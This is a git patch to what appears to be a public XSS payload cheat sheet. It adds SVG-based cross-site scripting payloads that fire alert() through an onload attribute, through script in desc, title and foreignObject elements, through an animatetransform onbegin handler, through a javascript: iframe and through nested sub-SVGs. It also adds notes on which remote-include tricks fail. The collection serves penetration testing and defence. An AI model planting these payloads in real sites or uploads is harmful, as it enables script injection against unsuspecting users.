From 8e05a2dd2ade3cac57350e0495c7e73444085e59 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Wed, 19 Jun 2024 14:54:19 +0200
Subject: [PATCH] XSS in SVG: more examples + nesting

---
 XSS Injection/README.md | 62 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 62 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index a5a487e..f77f631 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -383,6 +383,8 @@ vbscript:msgbox("XSS")
 
 ### XSS in SVG
 
+Simple script. Codename: green triangle
+
 ```xml
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
@@ -395,6 +397,29 @@ vbscript:msgbox("XSS")
 </svg>
 ```
 
+More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red lignthning. Author: noraj.
+
+```xml
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" width="100" height="100" xmlns="http://www.w3.org/2000/svg" onload="alert('svg attribut')">
+  <polygon id="lightning" points="0,100 50,25 50,75 100,0" fill="#ff1919" stroke="#ff0000"/>
+  <desc><script>alert('svg desc')</script></desc>
+  <foreignObject><script>alert('svg foreignObject')</script></foreignObject>
+  <foreignObject width="500" height="500">
+    <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('svg foreignObject iframe');" width="400" height="250"/>
+  </foreignObject>
+  <title><script>alert('svg title')</script></title>
+  <animatetransform onbegin="alert('svg animatetransform onbegin')"></animatetransform>
+  <script type="text/javascript">
+    alert('svg script');
+  </script>
+</svg>
+```
+
+
+
 ### XSS in SVG (short)
 
 ```javascript
@@ -405,6 +430,43 @@ vbscript:msgbox("XSS")
 <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
 ```
 
+### XSS in SVG (nesting)
+
+Including a remote SVG image in a SVG works but won't trigger the XSS embedded in the remote SVG. Author: noraj.
+
+SVG 1.x (xlink:href)
+
+```xml
+<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
+</svg>
+```
+
+Including a remote SVG fragment in a SVG works but won't trigger the XSS embedded in the remote SVG element because it's impossible to add vulnerable attribute on a polygon/rect/etc sicne the `style` attribute is no longer a vector on modern browsers. Author: noraj.
+
+SVG 1.x (xlink:href)
+
+```xml
+<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
+</svg>
+```
+
+However, including svg tags in SVG documents works and allows XSS execution from sub-SVGs. Codename: french flag. Author: noraj.
+
+```xml
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <svg x="10">
+    <rect x="10" y="10" height="100" width="100" style="fill: #002654"/>
+    <script type="text/javascript">alert('sub-svg 1');</script>
+  </svg>
+  <svg x="200">
+    <rect x="10" y="10" height="100" width="100" style="fill: #ED2939"/>
+    <script type="text/javascript">alert('sub-svg 2');</script>
+  </svg>
+</svg>
+```
+
 ### XSS in Markdown
 
 ```csharp